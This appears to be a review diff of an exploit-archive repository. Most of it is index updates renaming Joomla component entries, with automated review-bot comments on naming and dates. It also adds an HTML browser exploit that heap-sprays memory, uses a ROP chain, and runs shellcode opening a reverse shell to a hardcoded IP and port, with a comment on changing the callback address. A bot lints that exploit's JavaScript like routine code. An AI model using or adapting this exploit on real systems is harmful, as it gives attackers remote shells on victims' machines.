15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
@ -24246,7 +24251,7 @@ id,file,description,date,author,platform,type,port
15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
15743,platforms/php/webapps/15743.txt,"Blog:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0
15749,platforms/php/webapps/15749.txt,"Joomla! Component 'com_jradio' - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0
15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0
15754,platforms/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0
@ -24269,7 +24274,7 @@ id,file,description,date,author,platform,type,port
15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
15791,platforms/php/webapps/15791.txt,"Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
15791,platforms/php/webapps/15791.txt,"Joomla! Component JotLoader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0
15795,platforms/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0
15797,platforms/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
@ -25028,7 +25033,7 @@ id,file,description,date,author,platform,type,port
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
18048,platforms/php/webapps/18048.txt,"Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
18050,platforms/php/webapps/18050.txt,"Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
18050,platforms/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0
18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0
18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
@ -25305,7 +25310,7 @@ id,file,description,date,author,platform,type,port
18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0
18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Authenticated OS Command Injection (Metasploit)",2012-04-09,Metasploit,php,webapps,0
18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
18728,platforms/php/webapps/18728.txt,"Joomla! Component 'com_estateagent' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18728,platforms/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0
18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
@ -30659,7 +30664,7 @@ id,file,description,date,author,platform,type,port
30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0
29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0
29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0
@ -30969,7 +30974,7 @@ id,file,description,date,author,platform,type,port
30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - Picture_Real_Edit.asp SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - errors/rights.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - errors/transaction.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0
30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS - Client Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0
30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver 5.6.2929 CMS - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0
30300,platforms/asp/webapps/30300.txt,"MzK Blog - Katgoster.asp SQL Injection",2007-03-23,GeFORC3,asp,webapps,0
30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
@ -31516,8 +31521,8 @@ id,file,description,date,author,platform,type,port
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
@ -33082,7 +33087,7 @@ id,file,description,date,author,platform,type,port
33840,platforms/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33998,platforms/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
@ -33693,7 +33698,7 @@ id,file,description,date,author,platform,type,port
34812,platforms/php/webapps/34812.html,"Docebo 3.6 - 'description' Parameter Cross-Site Scripting",2010-10-04,"High-Tech Bridge SA",php,webapps,0
34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 - SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting",2010-10-05,"Moritz Naumann",php,webapps,0
34820,platforms/php/webapps/34820.pl,"Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
34820,platforms/php/webapps/34820.pl,"Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0
34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0
34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446
34975,platforms/php/webapps/34975.txt,"WordPress Plugin SEO Tools 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0
@ -33703,7 +33708,7 @@ id,file,description,date,author,platform,type,port
34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps,0
34833,platforms/php/webapps/34833.txt,"Joomla! / Mambo Component 'com_trade' - 'PID' Parameter Cross-Site Scripting",2010-10-11,FL0RiX,php,webapps,0
34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0
34837,platforms/php/webapps/34837.txt,"Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
34837,platforms/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0
34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0
34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
@ -34685,7 +34690,7 @@ id,file,description,date,author,platform,type,port
36434,platforms/php/webapps/36434.txt,"WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0
36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80
36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0
36439,platforms/php/webapps/36439.txt,"Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
36439,platforms/php/webapps/36439.txt,"Joomla! Component ECommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0
@ -34768,7 +34773,7 @@ id,file,description,date,author,platform,type,port
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0
36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0
36560,platforms/php/webapps/36560.txt,"Joomla! Component 'com_gallery_wd' - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@ -34796,7 +34801,7 @@ id,file,description,date,author,platform,type,port
36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
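Review bot: 36598 only loses its quotes ('com_kp' becomes com_kp) while its neighbours 36596 and 36597 keep the quoted form, so the row now matches neither the old convention nor the display-name convention used for the other renamed rows. If no product name is known, leaving the quoted 'com_kp' would be more consistent.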
@ -35525,7 +35530,7 @@ id,file,description,date,author,platform,type,port
37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0
37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0
37666,platforms/php/webapps/37666.txt,"Joomla! Component 'com_helpdeskpro' < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37666,platforms/php/webapps/37666.txt,"Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0
37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0
37675,platforms/php/webapps/37675.txt,"Joomla! Component 'Komento' - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0
@ -36891,3 +36896,7 @@ id,file,description,date,author,platform,type,port
40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80
40932,platforms/php/webapps/40932.txt,"WHMCS Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80
40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80
40939,platforms/php/webapps/40939.txt,"Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40940,platforms/php/webapps/40940.txt,"Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
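Review bot: the added rows 40939 and 40940 spell the prefix "Wordpress Plugin", while 40934 and 40941 in the same hunk use "WordPress Plugin"; normalise to "WordPress" so a case-sensitive search returns all of them. Also, 40942 carries the date 2016-08-04 although the rows added beside it are dated 2016-12-16 and 2016-12-19, so it is worth confirming that this is the intended date.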


@ -27,8 +27,6 @@
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os

platforms/linux/local/40936.html Executable file

@ -0,0 +1,112 @@
<!--
Download: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz
Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz
-->
<html>
<head>
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>
<p>
<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>
</p>
<p>
<FONT>n0MERCypDK </FONT>
</p>
</div>
<script language="JavaScript">
var xunescape = unescape;
oneblock = xunescape("%u0040%u1000");
stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141");
nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u056
8%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568");
ropgadget = xunescape("%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000")
<!-- connect back ("192.168.0.10,80") ffff = port, 01020304 = ipaddr "%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061" -->
shellcode = xunescape("%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061");
var fullblock = oneblock;
while (fullblock.length < 393216)
{
fullblock += fullblock;
}
var sprayContainer = new Array();
var sprayready = false;
var sprayContainerIndex = 0;
function fill_function()
{
if(! sprayready) {
for (xi=0; xi<800/100; xi++, sprayContainerIndex++)
{
sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;
}
} else {
DataTranslator();
GenerateHTML();
}
if(sprayContainer.length >= 1000) {
sprayready = true;
}
}
var searchArray = new Array();
function escapeData(data)
{
var xi;
var xc;
var escData='';
for(xi=0; xi<data.length; xi++)
{
xc=data.charAt(xi);
if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);
escData+=xc;
}
return escData;
}
function DataTranslator()
{
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["dac"] = "Kros";
var newElement = document.getElementById("content");
if (document.getElementsByTagName) {
var xi=0;
pTags = newElement.getElementsByTagName("p");
if (pTags.length > 0)
while (xi < pTags.length)
{
oTags = pTags[xi].getElementsByTagName("font");
searchArray[xi+1] = new Array();
if (oTags[0]) {
searchArray[xi+1]["dac"] = oTags[0].innerHTML;
}
xi++;
}
}
}
function GenerateHTML()
{
var xhtml = "";
for (xi=1;xi<searchArray.length;xi++)
{
xhtml += escapeData(searchArray[xi]["dac"]);
}
}
setInterval("fill_function()", .5);
</script>
</body>
</html>
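Review bot: the loop counter `xi` in `fill_function()` and in `GenerateHTML()` is assigned without `var`, so both loops write to one implicit global, while `escapeData()` and `DataTranslator()` declare theirs locally; declare it in each function. `setInterval("fill_function()", .5)` passes a string that is re-evaluated on every tick where a function reference would do, and the `ropgadget = xunescape(...)` line lacks the terminating semicolon that the `nopsled` and `shellcode` lines have.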

16
platforms/linux/local/40937.txt Executable file

@ -0,0 +1,16 @@
